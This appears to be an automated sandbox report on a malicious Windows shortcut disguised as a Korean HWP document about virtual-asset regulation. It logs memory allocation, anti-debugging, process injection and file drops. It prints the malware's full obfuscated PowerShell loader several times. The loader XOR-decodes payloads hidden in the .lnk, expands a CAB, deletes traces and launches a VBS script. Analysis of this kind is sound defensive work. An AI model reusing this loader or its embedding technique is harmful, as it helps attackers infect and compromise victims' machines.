NtProtectVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2025, 2:48 p.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;") )

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 10, 2025, 2:48 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;") )

Deletes executed files from disk (1 event)

file	C:\Users\Public\continent.cab

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\expand.exe" C:\Users\Public\continent.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2536 resumed a thread in remote process 2648
